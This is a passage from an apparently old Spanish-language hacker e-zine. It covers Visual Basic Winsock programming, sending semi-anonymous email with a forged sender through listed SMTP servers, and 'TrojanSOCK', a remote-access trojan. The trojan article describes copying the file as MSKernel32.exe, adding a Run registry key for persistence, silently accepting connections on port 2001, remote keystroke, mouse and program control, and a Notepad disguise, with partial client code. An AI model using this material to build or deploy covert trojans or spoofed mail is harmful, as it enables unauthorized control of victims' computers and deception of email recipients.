navegador) En este caso POST se usa para solicitar al servidor que asocie la direccion con el cuerpo del mensaje. Ahora si enviamos estas mismas lineas con nuestro programa a la direccion www.icq.com y recibiremos el codido fuente de la pagina donde dice si esta o no en linea el tal BillGates@Mierdasoft.com como es codigo fuente puro con algunas instrucciones lo procesamos Asi seria la funcion: Sub FuncionEnviar() Dim Com As String Com = "POST /scripts/SearchWWP.dll HTTP/1.1" + vbCrLf Com = Com + "Accept: image/gif, */*" + vbCrLf Com = Com + "Accept-Language: es" + vbCrLf Com = Com + "Content-Type: application/x-www-form-urlencoded" + vbCrLf

Com = Com + "Accept-Encoding: gzip, deflate" + vbCrLf Com = Com + "User-Agent: Mozilla/4.0 (compatible; _ MSIE 5.5; Windows 98)" + vbCrLf Com = Com + "Host: 127.0.0.1" + vbCrLf Com = Com + "Content-Length: 63" + vbCrLf Com = Com + "Connection: Keep-Alive" + vbCrLf Com = Com + "Cache-Control: no-cache" + vbCrLf Com = Com + vbCrLf Com = Com + "first=&last=&email=BillGates@Mierdasoft. _ com&handle=&Search=+Go+" + vbCrLf Winsock.SendData Com End Sub Creo que el principio ya esta claro, lo siguiente seria cambiar las partes de la cadena por variables. Utilizando el mismo principio podremos hacer un programa para enviar mensajes al icq, mensajes a telefonos moviles, hacer consultas a buscadores como yahoo o altavista , etc. Algo muy interesante es usar el servicio que ofrece www.netcraft.com esta web nos da mucha informacion acerca del servidor que le pidamos: ip, sistema operativo, version y otros datos utiles. Con un programa que se conecte a esta direccion ----> uptime.netcraft.com al puerto 80 y envie lo siguiente -----------------------------------------------------------------GET /up/graph?mode_u=off&mode_w=on&site=www.yahoo.com&submit=Examine HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* Accept-Language: es Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98) Host: 127.0.0.1 Connection: Keep-Alive (linea en blanco) (linea en blanco) -----------------------------------------------------------------La funcion seria asi: Sub Winsock_Connect() Dim Com As String Dim strWebPage As String Com = "GET /up/graph?mode_u=off&mode_w=on&site=" _ & Text1.Text & "&submit=Examine HTTP/1.1" + vbCrLf Com = Com + "Accept: image/gif, image/x-xbitmap, _ image/jpeg, image/pjpeg, */*" + vbCrLf Com = Com + "Accept-Language: es" + vbCrLf Com = Com + "Accept-Encoding: gzip, deflate" + vbCrLf Com = Com + "User-Agent: Mozilla/4.0 (compatible; _ MSIE 5.5; Windows 98)" + vbCrLf Com = Com + "Host: www.netcraft.com" + vbCrLf Com = Com + "Connection: Keep-Alive" + vbCrLf Com = Com + vbCrLf Winsock.SendData Com End Sub Recibiremos la informacion que posea Netcraft acerca de www.yahoo.com, ahora cambiamos esa direccion por la que queramos. Tendremos que formatear lo que

resivamos y tendremos una basica utilidad de analisis ;) Junto a este articulo hay un codigo fuente que hace lo que explicado -net.vbp Ahora haremos un programa que envie e-mail, podremos modificar los datos que enviemos y hacernos de un cliente un poco mas anonimo que los programas comunes de envio de corrreos tipo outlook, Eudora, etc. Veamos el envio de un mensaje: - - - - - - - - - - - - - - - - - - - - - Servidor->220 servidor.de.correo.com Cliente-->HELO aaaa Servidor->250 servidor.de.correo.com Cliente-->MAIL FROM:<senador@congreso.cl> Servidor->250 Ok Cliente-->RCPT TO:<goku@DBZ.com> Servidor->250 Ok Cliente-->DATA Servidor->354 End data with <CR><LF>.<CR><LF> Cliente-->Subject: saludos hola Cliente--> . Servidor->250 Ok: queued as 4tA1t50514 Cliente-->RSET Servidor->250 Ok Cliente-->QUIT Servidor->221 Bye - - - - - - - - - - - - - - - - - - - - - La linea MAIL FROM:<senador@congreso.cl> indica el remitente que daremos. El destinatario sera asi RCPT TO:<goku@DBZ.com> [Nex: Hay algunos servers que no aceptan los comandos en mayusculas, ojo con eso. De la misma forma, hay otros que tampoco aceptan los '<' '>', cuestion de probar antes ... ] Lo que sucedera normalmente es que al enviar un mail usando un cliente, el servidor smtp tomara el Remitente y el mensaje y enviara todo a la direccion goku@DBZ.com. Ahora para que este mensaje sea completamente anonimo, el servidor que usemos para enviarlo debera ocultar tu IP ,si la oculta o no lo sabremos enviando el mensaje a nosotros mismos y revisando en la cabecera si esta nuestra IP. La utilidad de hacer un cliente es que podamos enviar unas lineas como las siguentes: MAIL FROM:cualquier_user@cualquierDominio.com RCPT TO:moya@loquequiera.com y el servidor smtp lo permita y no de error alguno, Entonces tenemos un servidor util, ahora si te topas con alguno que oculte tu IP, entonces estas OK. Ahora bien ya sabemos lo que sucede al enviar un mensaje de correo, si lo pasamos a una funcion de Visualbasic quedaria como el ejemplo en smtp.vbp (smtp.zip) basicamente eso seria un mensaje semianonimo. Algunos servidores smtp (no son anonimos):

smtp.mail.yahoo.com zagnut.hotpop.com mc7.law5.hotmail.com IT.itweb.com.mx mailrecv4.bigmailbox.com Cualquier duda, comentario, reclamo, correccion, etc, etc escribe a: Netreus@bigfoot.com Agradezco a : Loko Guajiro Patrick Moore

-. Netreus .-

:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: -:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:..--:: 05. El control Winsock.ocx y creacion de troyanos bajo VB ::--.. by SLAYER 1.- INTRODUCCION Despues de leer el articulo de SHISEI BRUJO, Programacion en 546.604.465 Pasos y ver la seccion del NetFuck en la que decia: << Tampoco funciona en internet ya que no trabaja con puertos, ips, etc. Eso si funciona en redes locales y en windows nt. Y como no trabaja con los puertos es muy dificil que lo detecten. Si quieren uno que funcione en internet, haganlo ustedes o quieren todo en bandeja ?. >> Pues como tiene razon, pues lo he hecho yo. Pero primero veremos como usar el control Winsock.ocx, en el que se basa el funcionamiento del TrojanSock. El origen del nombre esta claro, no? 2.- VALE, SI, PERO QUE #!@%& ES EL WINSOCK? Pues el Winsock es un control ocx incluido por el Visual Basic que permite establecer conexiones remotas con otros sistemas. Y esto para que sirve? Pues para lo que quieras. Desde hacer un Winpopup.exe como el de windows (si no sabes que es ejecutalo, no rompe nada) mandar un simple e-mail hasta para hacer un troyano :). Funciona con el protocolo TCP/IP o con el UDP. Nosotros vamos a usar el de toda la vida, el TCP. 3.- BUENO, Y TODO ESTO PARA QUE SIRVE? Primero tienes que abrir el Visual Basic (evidente, no?) y hacer click derecho en la barra de controles. A continuacion selecciona la opcion Componentes. En el cuadro que os saldra teneis que buscar la casilla Microsoft Winsock Control (la version puede ser distinta) y la activas. Aceptais y os aparecera en la barra de controles un nuevo boton, el de nuestro Winsock.ocx. Si le dais doble click si os insertara en el form. Lo primero que hay que hacer una vez que tenemos nuestro control es ajustarle las propiedades. La propiedad protocol la ajustamos en 0-sckTCPProtocol (TCP) Las otras propiedades que hay ajustar pueden hacerse RunTime (en ejecucion). En localport habra que poner en que puerto escuchara nuestra aplicacion, en

remoteport el puerto al que se mandaran los datos al ordenador remoto y en remotehost, la direccion IP del ordenador remoto. Los eventos del control winsock son los siguientes: Private Private Private Private Private Sub Sub Sub Sub Sub Winsock1_Close() Winsock1_Connect() Winsock1_ConnectionRequest(ByVal requestID As Long) Winsock1_DataArrival(ByVal bytesTotal As Long) Winsock1_Error(ByVal Number As Integer, Description As Strin

g, _ tring, _

ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As S

ByVal HelpContext As Long, CancelDisplay As Boolean) Private Sub Winsock1_SendComplete() Private Sub Winsock1_SendProgress(ByVal bytesSent As Long, ByVal bytesRe maining As Long) De momento nosotros solo utilizaremos las que nos permiten hacer la conexion y recibir y enviar datos: Private Private Private Private Sub Sub Sub Sub Winsock1_Close() Winsock1_Connect() Winsock1_ConnectionRequest(ByVal requestID As Long) Winsock1_DataArrival(ByVal bytesTotal As Long)

Tambien puede ser util la que nos permite calcular el progreso del envio: Private Sub Winsock1_SendProgress(ByVal bytesSent As Long, ByVal bytesRe maining As Long) Tambien usaremos estos metodos .Accept .Close .Connect .Listen .GetData .SendData <---<---<---<---<---<---Acepta una conexion solicitada Cierra una conexion Establece una conexion "Escucha" y recibe datos Obtiene los datos que llegan Envia los datos

Y bueno, ahora que tenemos todas las funciones, metodos y demas, hay que hacer un programa cliente-servidor que nos permita enviar y recibir datos desde un ordenador remoto. Vamos a hacer una simple aplicacion que sirva para mandar mensajes entre dos ordenadores. 4.- PRIMERA APLICACION CLIENTE - SERVIDOR Necesitamos 2 aplicaciones, una sera el servidor, y otra el cliente. Primero haremos el servidor. Abrimos el VB e insertamos en nuestro form los siguientes controles con sus respectivas propiedades: Label1 Label2 -> Caption="Escriba su mensaje:" -> Caption="El usuario remoto respondio:"

TextBox1 -> Justo a la derecha de label1. Name="Mensaje" Label3 -> Justo a la derecha de label2. Name="Respuesta" Winsock1 -> Name="Servidor"

Perfecto. Ahora tenemos que insertar el siguiente codigo en nuestro form: {[--------------------------------- CODIGO --------------------------------]} 'Recuerda que todo lo que empieza por comilla simple (') son comentarios Private Sub Form_Load() Servidor.LocalPort = 2001 'Como el a~o en que acaba el siglo! Servidor.Listen 'Aqui ha establecido el puerto local y prepara 'el winsock. para escuchar End Sub Private Sub Servidor_ConnectionRequest(ByVal requestID as Long) Dim Aceptar As Boolean Dim CodigoRespuesta As Byte Aceptar = False 'El siguiente codigo pregunta al usuario local si acepta la 'conexion. En caso afirmativo comprueba que no hay ya una 'abierta. Si la hay la cierra. Despues de todo esto, acepta 'la conexion con el metodo .Accept requestID CodigoRespuesta = MsgBox("Acepta la conexion?", vbYesNo) If CodigoRespuesta = 6 Then Aceptar = True If Aceptar Then ' Ver Tabla1 para las constantes de la propiedad State If Servidor.State <> sckClosed then Servidor.Close Servidor.Accept requestID End If End Sub Private Sub Mensaje_KeyDown(KeyCode As Integer, Shift As Integer) 'Si se pulsa el [ENTER] envia el texto del textbox mediante 'el metodo .SendData Data If KeyCode=13 then Servidor.SendData Mensaje.text End Sub Private Sub Servidor_DataArrival(ByVal bytesTotal as Long) Dim Datos as String Servidor.GetData Datos 'Recoge los datos entrantes y los Respuesta.Caption = Datos 'guarda en Datos. Luego los pasa 'al label de respuesta End Sub {[--------------------------------- CODIGO --------------------------------]}

Creo que esta suficientemente comentado para que no quepa ninguna duda. Aqui va la Tabla1, la de las constantes de la propiedad State: --------------------------------------------------------------Tabla1: Lista de constantes de la propiedad State | --------------------------------------------------------------| CONSTANTE | VALOR | DESCRIPCION | | | | | | SckClosed | 0 | Cerrado. Valor por defecto | | SckOpen | 1 | Abierto. | | SckListening | 2 | Escuchando. | | SckConnectionPending | 3 | Conexion pendiente. | | SckResolvingHost | 4 | Resolviendo host. | | SckHostResolved | 5 | Host resuelto. | | SckConnecting | 6 | Conectando | | SckConnected | 7 | Conectado | | SckClosing | 8 | Cerrando conexion. | | SckError | 9 | Error. | |_________________________|_______|_____________________________| | Bueno, ya esta la tabla. Ahora vamos a por la aplicacion cliente. En realidad es practicamente igual, pero habra que establecer los valores de ordenador remoto, puerto remoto y puerto local. Crearemos los mismos controles: textbox, pero con la propiedad Enabled=False y tambien crearemos los mismos label y el winsock, pero este ultimo tendra el nombre de "Cliente". Ademas hay que crear un boton con Nombre="Conectar" y Caption="Conectar". El codigo de la aplicacion cliente es el siguiente: {[--------------------------------- CODIGO --------------------------------]} 'Recuerda que todo lo que empieza por -'- son comentarios Private Sub Form_Load() Cliente.RemotePort = 2001 End Sub Private Sub Conectar_Click() Mensaje.Enabled = True Cliente.RemoteHost = Inputbox("A que ordenador se quiere conectar Cliente.Connect Conectar.Enabled = False End Sub Private Sub Mensaje_KeyDown(KeyCode As Integer, Shift As Integer) If KeyCode=13 then Cliente.SendData Mensaje.text End Sub

?")

Private Sub Cliente_DataArrival(ByVal bytesTotal as Long) Dim Datos as String Cliente.GetData Datos Respuesta.Caption = Datos End Sub {[-------------------------------- CODIGO ---------------------------------]} Este codigo no esta comentado, pero es practicamente igual que el anterior, pero ahora explico el funcionamiento del conjunto cliente-servidor: La aplicacion cliente consta del boton "Conectar". Este preguntara por la direccion IP del ordenador remoto (que para hacer pruebas podemos usar el nuestro con direccion IP 127.0.0.1). Los puertos los establece en Form_Load() Despues de especificar la IP se conecta al servidor. El servidor pregunta al usuario si acepta la conexion desde el ordenador remoto y usa la funcion ConnectionRequest(ByVal requestID as Long). Mira si hay una conexion ya hecha (Servidor.State <> sckClosed) y en este caso la cierra. Despues establece la conexion. Una vez que esta hecha la conexion los controles textbox envian el mensaje al otro ordenador mediante la funcion SendData. El otro ordenador la recibe mediante la funcion DataArrival y establece el valor en el label de respuesta. 5.- DESPEDIDA Se acabo. Espero que os sirva de provecho. Si tengo tiempo acabare del todo el troyano y preparo un articulo para el proximo numero, si no os preparo una "suite" de correo con mail-bomber incluido :) (siempre y cuando el editor me de permiso claro [porfa, dejame hacer otro articulo, porfa]) [ Nex: No se, no se, ... venga bah, el siguiente espacio es tuyo :D] [ Nex: Y como somos tan asquerosamente lentos para publicar los zines, el articulo para el 'proximo numero' va en este mismo xDDD ] SLAYER sslayer@bigfoot.com *-***-*-***-*-***-* 534154414E204C41 55474853204153 20594F552045 5445524E41 4C5920524F54 *-***-*-***-*-***-* :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: -:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:..--:: 06. TrojanSOCK: el troyano de VB ::--.. by SLAYER 1.- HERE WE ARE

Aqui estamos. Como prometi, el troyano que estabais esperando. Lo he llamado TrojanSOCK, y al que se meta con mi imaginacion se lo cuelo. Que no, que es broma :) Bueno el caso es que este es el primer troyano hecho en VB que usa puertos (al menos que yo sepa). Evidentemente tiene sus limitaciones (que son muchas, sobre todo por estar en VB, pero es un lenguaje muy sencillo de aprender). La principal limitacion que tiene son los dll's necesarios. Porque por algun motivo, con Visual Basic es imposible hacer un programa que de media no necesita unas 5 dll. Bueno esa es la mayor limitacion del visual basic, ademas de que al estar hecho con algo de microsoft (bueno, y que yo no soy un genio de la programacion) probablemente se quede colgado cuando le metas un buffer (tengo que probar eso), o simplemente cuando el dia y la hora coincidan. Windows es asi (y yo no soy un genio). Pero no os vayais a creer, que tambien tiene sus ventajas como pueden ser las siguientes: 1. No lo detectan los antivirus (en realidad no lo he probado, no tengo antivirus instalado, pero no ha salido a la luz hasta ahora, asi que no han tenido tiempo de analizarlo) 2. Lo he hecho yo :) Bueno, esa es una ventaja para mi, lo mismo hasta me hago famoso! En realidad lo dudo mucho pero al menos se aprende un poco con el 3. Eh... esto... pues ... ahora no me acuerdo, pero seguro que tiene que haber mas ventajas. 2.- LAS FUNCIONES Pues he intentado a~adir las funciones mas utiles (o entretenidas). A saber: Cerrar / Borrar servidor Abrir / Cerrar el CD Un gestor de mensajes Enviar teclas Controlar el raton Invertir los botones del raton Salir de windows Ir a una URL Ejecutar un programa Reproducir un sonido Mostrar una imagen Notepad (ein? Lo cualo?) Ver explicacion mas adelante. Ademas con la capacidad de registrar todas las acciones ejecutadas. Y otra funcion que no he conseguido implementar es la de capturar la pantalla del servidor, en parte porque no se como se envian ficheros a traves del WINSOCK.OCX, lo que es el gran problema que presenta el troyano, que no puede subir/bajar ficheros. Una verdadera pena porque es de las funciones mas utiles porque ya me contaran de que me sirve ejecutarle al pardillo el paint :) Y por si todas estas pegas fueran pocas, no puedo asegurar que la funcion de mostrar una imagen funcione bien, al final he acabado de los nervios y lo he dejado asi. Quejas a quien tenga tiempo para solucionarlo. 3.- FUNCIONAMIENTO DEL SERVIDOR Pues primero accede al registro EAX adjudicandole el valor de 0EF3 mas el valor actual de la direccion del segmento de codigo GDI.DLL punto de interrupcion... Ah vale, no tan especifico, verdad? Ok, cuando la victima ejecuta el fichero pues no pasa nada. Al menos eso es lo que se cree.

Probablemente lo ejecute unas 5 o 6 veces hasta asegurarse de que no se ha equivocado. Lo mas posible es que a la 7 ya note que pasa algo raro, pero para aquel entonces nuestro troyanito ya ha hecho de las suyas: {PASO 1} Se ha copiado como C:\windows\system\MSKernel32.exe y ha a~adido una clave al registro en HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run con el nombre y valor MSKernel32 -- C:\windows\system\MSKernel32.exe Evidentemente esto sirve para que a la proxima se ejecute. {PASO 2} Despues de hacer todo eso, ha abierto el puerto 2001 (es que me ha gustado lo del fin del milenio) y se ha puesto a escuchar como un desesperado y a esperar a una peticion de conexion. {PASO 3} Cuando recibe una peticion para establecer la conexion, pues lo hace, pa' que se va a complicar la vida. Evidentemente no hara como en nuestro programilla de chat, que preguntaba al usuario-servidor si aceptaba la conexion, de lo contrario no seria un troyano. Envia una cadena de bienvenida al cliente y ya esta listo para aceptar comandos. {PASO 4} Cada vez que recibe algun dato lo recibe en una variable (Datos) y lo junta con otra variable llamada DatosRecibidos. Aum... y pa' que hace eso? Pues es muy facil. He intentado hacerlo totalmente compatible con Telnet, y al menos el de windows va enviando lo que escribes caracter por caracter, y el troyano no entenderia ese caracter como una orden. Asi que, si estamos usando telnet, no hara falta que nos preocupemos de nada. De todas formas mas adelante explicare mas profundamente el funcionamiento del codigo. {PASO 5} La forma de enviar los comandos es un poco especial. Hace como el netbus,envia los comandos seguidos de sus parametros, pero un fallo que he apreciado en el netbus, es que separa los parametros con punto y coma (;). Esto no seria un fallo si no fuera porque a algunos nos gusta puntuar mas o menos correctamente lo que escribimos. Asi, si le queremos enviar con el NetBus un mensaje, o file que incluya el punto y coma, no lo lograremos. Un ejemplo: Queremos enviar el mensaje siguiente al servidor _________________________________ |ERROR GRAVE x | |--------------------------------| Menudos graficos los mios, no |Windows causo un error de falta | me extra~a que siempre me |de espacio en la pila; debido a | suspendieran en dibujo . . . |esto, en un plazo de 15 segundos| |el sistema se reiniciara | | ___________ | | | ACEPTAR | | | ----------| |________________________________| Pues no podemos. Y por que no? Pues muy facil. Hemos incluido un punto y coma en el texto: "... en la pila; debido a..." Y ese punto y coma nos lo estropea porque el servidor entendera que el texto llega hasta "pila" y que lo siguiente es otro parametro (los botones-icono). Pues bien, el TrojanSOCK no tiene ese problema, porque utiliza este modo de enviar los comandos: NumeroParametrosACCIONParametro1Parametro2Parametron...

Ejemplo: 3Enviar mensajeTEXTOTIPOTITULO Los codigos ASCII son: (999) (987) y (789) NOTA: El codigo del 987 ^^^ en windows se ve como un subrayado bajo _ Despues analizaremos el codigo utilizado para esto. De todas formas dudo mucho que la gente vaya a escribir puntos y comas, pero en fin, algun enter, si que se tecleara, no? {PASO 6} Ya hemos recibido una orden. Pues ahora no tiene mas que comprobar que existe y ejecutarla. Luego envia una cadena vbCrLf (13,10) para que si usamos telnet no tengamos una lista impresionante de acciones en la misma linea. Suponiendo que el usuario tenga que responder (un boton, o escribir algo) tambien se envia la respuesta del usuario. {PASO 6:A} Si la orden ha sido la de cerrar el servidor, simplemente cierra el programa. {PASO 6:B} Para desinstalar el servidor ajusta la llave anteriormente dicha, la ajusta en blanco (""). Ademas ejecuta un 'Kill "C:\windows\system\MSKernel32.exe' pero claro, como esta en ejecucion, no lo deja. Por eso he a~adido un 'On error Resume Next', en vez de quitar la linea por si acaso en alguna de estas resulta (lo dudo mucho) Pero ojo, el programa sigue ejecutandose, si quieres cerrarlo tendras que ejecutar la orden de Cerrar Servidor despues. {PASO 7} Pues si no me equivoco, ya estan todos los pasos, asi que vamos con el cliente 4.- FUNCIONAMIENTO DEL CLIENTE {PASO 1} Se abre. Bien, te aparece un formulario MDI (en realidad lo he quitado en la ultima version y es una ventanita normal y corriente, asi que no hagais caso de lo que acabo de poner) muuuuuuuuy parecido al del NetBus. No hay mas que seleccionar el host remoto y el puerto, que a menos que lo hayas modificado en el servidor, sera el 2001. Y bueno, nada mas, si esta activada la casilla de registrar acciones, se guarda en un fichero llamado c:\windows\temp\cliente.log Vereis que en la parte de abajo hay un cuadrito de texto, ahi sera donde vamos a ver las respuestas que nos envie el servidor. Y no hay mas que contar de esto {PASO 2} Cada vez que haces click en uno de los botones, cada cual de ellos es una orden se ajustan varios parametros. 1- La Accion, que generalmente llevara el caption del boton que la ha originado. 2- Los Parametros: pues eso, los parametros los ajusta en la variable Parametro() y su index respectivo. 3- Lo junta todo en un Paquete que va a ser el que envie. {PASO 3} Cada vez que recibe algun dato nos lo presenta en el cuadrito de texto, ya lo he explicado antes. {PASO 4} Creo que nada mas.

5.- FUNCIONAMIENTO ESPECIFICO (Analisis del codigo) DEL SERVIDOR {PASO 1} Para poder copiar el fichero usamos la API de Windows GetCommandLine que en futuras versiones tambien nos servira para pasarle parametros al ejectuarlo. Bueno, el caso es que lo usamos, pues para eso para ObtenerLineadeComandos. Y porque no hago directamente app.fullname? Muy simple App.Fullname tiene el nombre interno del exe, el nombre con el que *YO* he compilado el programa. Pero si tu lo renombras(lo mas natural para camuflarlo) ese ya no sera el nombre del exe. Asi que obtengo la lina de comandos y cojo el nombre. El problema de esta funcion es que me lo devuelve entre comillas, que hay que eliminar. Aqui me da un fallo muy extra~o. Si le pongo lo siguiente: nombre=mid$(LineaDeComandos,2,len(LineaDeComandos)-1) no me quita las ultimas comillas, y he tenido que reemplazar ese -1 por un -4. No me pregunteis porque al ponerle un Trim(LineaDeComandos) no me quita los espacios, no lo se :( El codigo que uso para crear la llave en el registro es muy curiosa. No por nada en especial, si no porque intente hacerlo con su API correspondiente,pero estaba harto de tanta API, asi que busque, busque, busque, y ENCONTRE! Agarre mi fichero love-letter-for-you.txt.vbs y le "robe" a spyder el codigo que uso el en el virus ILOVEYOU (thanks, spyder). Probablemente esto ralentice la ejecucion, pero yo no he notado que tarde demasiado asi que creo que va bien asi. {PASO 2} Servidor.LocalPort = 2001 Servidor.Listen No tiene mas misterio {PASO 3} Private Sub Servidor_ConnectionRequest(ByVal requestID As Long) bla, bla, bla... Si no esta cerrado, lo cierra, acepta la peticion y tras esperar 2 segundos, envia la cadena de texto (por si usas telnet): Servidor.SendData "TojanSOCK v1.0. by SLAYER Teclee HELP para obtener ayuda de como introducir los comandos" (En una linea, claro)

End Sub

{PASO 4} Private Sub Servidor_DataArrival(ByVal bytesTotal As Long) Coge los datos y los guarda en la variable DATOS A la variable DatosRecibidos le agrega al final los DATOS nuevos. Analiza si el primer caracter es el de fin de paquete (). En este caso elimina ese caracter. Si el ultimo caracter es el de fin de paquete (), Analiza(DatosRecibidos) y estos, los ajusta en blanco ("") Tambien analiza si los DatosRecibidos="HELP" y ejecuta el Sub Ayuda() Este codigo envia datos de ayuda acerca de como enviar los comandos y cuales estan soportados. Evidentemente, esto solo es util (mucho) cuando usas telnet como cliente, asi no hace falta que memorices todos los comandos y codigos. Solo "HELP". Despues, borra el contenido de los DatosRecibidos. Tambien borramos la variable Datos

(pa' por si acaso, no me fio) End Sub {PASO 5} Sub Analiza(Paquete As String) Bien, aqui tomamos la longitud del paquete que luego usaremos. Usando varias veces la funcion split conseguimos fragmentar el paquete y convertirlo a lo que era antes para poder ejecutarlo Llamamos a la rutina que ejecuta las acciones: Hazlo() End Sub {PASO 6} Esto lo hace simplemente con un Select Case comprobando si corresponde Accion realmente a alguna orden. La ejecuta y envia un vbCrLf. Un codigo muy simple {PASO 6:A} Pues eso, cierra el programa. Un End, mas facil no puede ser, aunque le indicamos primero que es un "CierreControlado", porque de lo contrario se nos ejecutaria otra vez. Esto es por si a alguien se le ocurre hacer un ctrl-alt-supr se canse de que al intentar cerrar el servidor se encuentre con que no tiene un servidor abierto si no dos {PASO 6:B} Para desinstalar el servidor simplemente ajusta la clave del registro anteriormente dicha a un valor en blanco (""). Ademas "intenta" y digo "intenta" ejecutar un 'Kill c:\windows\system\MSKernel32.exe' pero digo que intenta porque el programa esta en ejecucion y no le dejen pero por probar, que no quede. Por eso ponemos al principio un 'On Error Resume Next' para que si da fallo que pase olimpicamente de el. Me acabo de dar cuenta de que esto ya lo he dicho. En fin, esto es el Alzheimer... {PASO 7} Pero a ver, no habiamos quedado en que no habia 7o paso? Si es quee... 6.- FUNCIONAMIENTO ESPECIFICO (Analisis del codigo) DEL CLIENTE {PASO 1} Aqui no hay ningun codigo especial, lo unico es que si esta activada la casilla de registrar acciones, se guarda en un fichero llamado c:\windows\temp\cliente.log con una serie de Print #1, bla bla bla {PASO 2} Ok, este es el codigo mas importante del cliente, pero tambien es muy pero que muy sencillo. De todas formas lo voy a hipercomentar :) Sub Enviar_Orden() On Error Resume Next 'Ajusta el comienzo de parametros a ListaParametros = ""

'A la variable le va ajustando los valores de 1 hasta el numero de Parametros 'que hay adjudicados For i = 1 To Parametros - 1 'A ListaParametros le a~ade el nuevo Parametro(i) y el caracter de 'SiguienteParametro (), guardado como constante global al principio ListaParametros = ListaParametros + Parametro(i) + SiguienteParametro Next i 'A~ade el ultimo Parametro. Y ahora que lo pienso no se porque no lo he 'puesto en el bucle de arriba. . . Ah si! Es que el ultimo parametro no 'ha de llevar el caracter deSiguienteParametro ListaParametros = ListaParametros + Parametro(i) 'Convierte Paquete en lo que debe ser, una cadena que incluya los siguientes 'campos: NumeroParametros + Accion + ListaParametro + FinParametros 'Un ej. 2DialogarComo te llaamas?NOMBRE Paquete = Trim(Str(Parametros)) + Accion + ListaParametros + FinParametros 'Y lo envia. Cliente.Cliente.SendData Paquete 'Ahora hacemos un DoEvents 'Con esto conseguimos que el sistema tome el control y envie 'inmediatamente el paquete De lo contrario lo haria al terminar la rutina 'Si estamos registrando las acciones en un log If LOG = True Then 'Le mete una cadena de Astericos (*************************) Print #1, Asteriscos 'La accion que se ha ejecutado con la hora puesta Print #1, "Accion ejecutada: " + Accion + " a las " + Time$ 'El numero de parametros Print #1, " Parametros: " + Trim(Str(Parametros)) 'Y todos esos parametros For i = 1 To Parametros Print #1, " " + Parametro(i) Next i End If 'Una vez que lo hemos usado todo, los Parametros son ninguno (0) Parametros = 0 For i = 0 To 9 'Y los borra de uno en uno COMPLETAMENTE, lo pone en Null (nulo) Parametro(i) = Null 'Puede que no hiciera falta, pero no me fio 'demasiado de mi buen hacer Next i End Sub {PASO 3} Pues muy facil, Private Sub Cliente_DataArrival(ByVal bytesTotal As Long)

Dim Datos As String 'Coge los Datos Cliente.GetData Datos 'Y los pone en el cuadrito de Telnet Remoto.Text = "RESPUESTA DEL USUARIO/SERVIDOR:" + vbCrLf + Datos 'Si estamos guardando las cosas en un LOG, pues lo guarda. If LOG = True Then Print #1, "Respuesta del usuario: " + Datos End If End Sub {PASO 4} Naaaaaada mas. Se acabo por hoy. Me voy a descansar y ma~ana sigo escribiendo. 7.- ULTIMAS ACLARACIONES Pues creo que ninguna, pero despues de dormir durante toda la noche me apetecia escribir mas cosas, pero todavia no se me ha ocurrido nada. Pensaba explicar mas codigo, pero es un c*~*z*, al menos para el que escribe. Ademas, el resto del codigo, aunque necesario, es simple, y como es tan simple no lo voy a explicar, esto no es curso de programacion basica, solo de uso del winsock y sus aplicaciones, claro que si os empe~ais... (no lo hagais, please) Bien, hagamos memoria . . . si, eso es, el notepad. Que para que quiero la cosa esa? Pues muy simple. No se vosotros, pero yo de vez en cuando pruebo estas cosas en el aula de informatica del instituto, y sinceramente, paso de que el pringao del profesor me vea con esta clase de movidas. Asi que un simple doble click, y tenemos nuestro trojansock transformado en un rudimentario notepad. No le he puesto las funciones de notepad, como es logico, no voy a hacer esas chorradas, es solo para disimular (Gracias por la idea a mi cerebro :) ). Bueno, un doble click en la ventana y nos sale el notepad, un click en Ayuda Acerca de Bloc de Notas y volvemos a nuestro TrojanSOCK. Si a alguien le parece superfluo que me lo diga (o que directamente lo quite antes de compilar). 8.- CONCLUSION Supongo que ya os habreis dado cuenta todos de que este no es el mejor troyano del mundo (ni muchisimo menos!) y que realmente su utilidad es muy poca. No permite subir o descargar ficheros, no tiene ni un keylogger, y desde luego es lento, pesado y necesita cientos de ficheros adjuntos, con lo cual no es ni un minimo competidor con ningun otro troyano. Tambien como vereis no permite trabajar con los ficheros remotos a ciegas, cosa que si podria haber incluido pero no me parece buena idea meter una sola linea con un Kill Fichero para que los lamers se dediquen a hacer el vandalo por ahi con mi trabajo. De todas formas tampoco es la ilusion de mi vida dedicarme a fabricar troyanos en visual basic, tan solo fue una idea basada en el texto de Shisei Brujo (saludos). El caso es que con todo el rollo anterior lo que quiero decir es que perdoneis los cientos de fallos que tendra el troyano, no trabajo en esto y no es facil solucionar (y a veces encontrar) los bugs que hay. De todas formas intentare mejorarlo y solucionar todos los problemas que haya, tiempo al tiempo . . . 9.- DESPEDIDA Pues eso, que me despido. Si alguien me quiere hacer una sugerencia, estoy

abierto a ellas, al igual que estoy abierto a todo tipo de criticas, pero si son constructivas mejor que mejor. Si alguien tiene alguna duda, o aportacion (sobre todo esto ultimo) que me la mande que ya me ocupo yo de responder las posibles dudas que surjan, y en el caso de aportaciones al TrojanSOCK vere si son incluibles (se escribe asi? uh) o no, y si lo son las a~ado, haciendo una mencion al creador, por supuesto. SLAYER sslayer@bigfoot.com *-***-*-***-*-***-* 534154414E204C41 55474853204153 20594F552045 5445524E41 4C5920524F54 *-***-*-***-*-***-* :-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-: -:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:: 07. WAP: La Internet mas facil? (Introduccion a esta tecnologia) ::by krajeck Introduccion -----------Cuando empeze a escribir este informativo, WAP no estaba muy difundida en Chile, pero como cada vez me fui atrasando mas, y llego hasta este momento en que ya mucha gente la conoce y la utiliza, cosa que puede favorecer al 